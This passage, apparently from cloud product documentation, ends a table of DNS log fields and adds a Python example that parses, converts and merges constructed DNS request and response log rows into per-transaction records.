src_port | The number of the port from which the DNS request or response is initiated. | 53 |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
time_usecond | The timestamp of the DNS request or response. Unit: microseconds. | 590662 |
tunnel_id | The ID of the tunnel used by the DNS request or response. Tunneling is a way to transfer data by using different protocols. Tunneling can be used for secure access to the Internet or for communications across different networks. | 514763 |
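Added example (not the page's or the product's own code) for the DNS logs and local DNS logs tables: it converts the decimal-integer `src_ip`/`dst_ip` form to dotted quads, maps the numeric `query_type`/`answer_type` codes to record-type names using the standard DNS type codes (1 = A), parses the space-separated `answer`/`authority` strings shown in the DNS logs table, and folds request and answer rows into one record per transaction. The rows are constructed; treating `id` as shared by a request and its response rows and `time_usecond` as the sub-second part of `start_time` are assumptions of this example, not statements from the page.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Standard DNS resource record type codes (RFC 1035, RFC 3596) for the numeric
# query_type / answer_type fields; the page's example value 1 is an A record.
DNS_TYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 12: "PTR", 15: "MX", 16: "TXT", 28: "AAAA"}

# Constructed local DNS rows: one request row (group_id 3) and two answer rows of the
# same response (group_id 4). Decimal IPs are constructed: 168427521 = 10.10.0.1 (client),
# 3232235777 = 192.168.1.1 (resolver). The `anwser_name` spelling is the log schema's own.
_BASE = {"id": 64588, "host": "web-01", "instance_id": "i-constructed0001",
         "query_name": "example.com", "query_type": 1, "start_time": 1719472214, "ip_ttl": 64}
_RESP = {**_BASE, "group_id": 4, "src_ip": "3232235777", "src_port": 53,
         "dst_ip": "168427521", "dst_port": 41234, "time_usecond": 603114,
         "anwser_name": "example.com", "answer_type": 1, "answer_ttl": 600}
SAMPLE_ROWS = [
    {**_BASE, "group_id": 3, "src_ip": "168427521", "src_port": 41234,
     "dst_ip": "3232235777", "dst_port": 53, "time_usecond": 590662},
    {**_RESP, "answer_rdata": "203.0.113.10"},
    {**_RESP, "answer_rdata": "203.0.113.11"},
]


def decimal_to_ip(value) -> str:
    """Convert the decimal-integer IP form of src_ip/dst_ip to dotted quad.
    Values already in dotted (or IPv6) form are returned unchanged."""
    text = str(value)
    if "." in text or ":" in text:
        return text
    return str(ipaddress.IPv4Address(int(text)))


def event_time(start_time: int, time_usecond: int) -> datetime:
    """Second-resolution start_time plus the microsecond field (assumed to be the
    sub-second part), combined with timedelta so no float rounding is involved."""
    return datetime.fromtimestamp(start_time, tz=timezone.utc) + timedelta(microseconds=time_usecond)


def parse_answer_field(text: str):
    """Parse the `answer`/`authority` strings of the DNS logs table, e.g.
    'example.com A IN 52 1.2.3.4' (5 tokens) or 'NS IN 17597' (3 tokens, no name
    or rdata). The 'N/A' placeholder yields None."""
    if not text or text == "N/A":
        return None
    tokens = text.split()
    if len(tokens) >= 5:
        name, rtype, rclass, ttl = tokens[:4]
        rdata = " ".join(tokens[4:])          # TXT/MX rdata may contain spaces
    elif len(tokens) == 3:
        name, rdata = None, None
        rtype, rclass, ttl = tokens
    else:
        raise ValueError(f"unrecognised answer field: {text!r}")
    return {"name": name, "type": rtype, "class": rclass, "ttl": int(ttl), "rdata": rdata}


def normalize_local_dns(rows):
    """Fold local DNS rows into one record per transaction (instance, id, query_name)."""
    by_txn = defaultdict(lambda: {"answers": []})
    for row in rows:
        rec = by_txn[(row["instance_id"], row["id"], row["query_name"])]
        rec.setdefault("query_name", row["query_name"])
        rec.setdefault("query_type", DNS_TYPE_NAMES.get(row["query_type"], str(row["query_type"])))
        if "answer_rdata" in row:             # response row: resolver -> client
            rec["resolver"], rec["client"] = decimal_to_ip(row["src_ip"]), decimal_to_ip(row["dst_ip"])
            rec["response_time"] = event_time(row["start_time"], row["time_usecond"])
            rec["answers"].append({
                "name": row["anwser_name"],
                "type": DNS_TYPE_NAMES.get(row["answer_type"], str(row["answer_type"])),
                "ttl": row["answer_ttl"],
                "rdata": row["answer_rdata"],
            })
        else:                                  # request row: client -> resolver
            rec["client"], rec["resolver"] = decimal_to_ip(row["src_ip"]), decimal_to_ip(row["dst_ip"])
            rec["request_time"] = event_time(row["start_time"], row["time_usecond"])
    for rec in by_txn.values():
        if "request_time" in rec and "response_time" in rec:
            rec["latency_us"] = (rec["response_time"] - rec["request_time"]) // timedelta(microseconds=1)
    return list(by_txn.values())


if __name__ == "__main__":
    for rec in normalize_local_dns(SAMPLE_ROWS):
        print(rec)
```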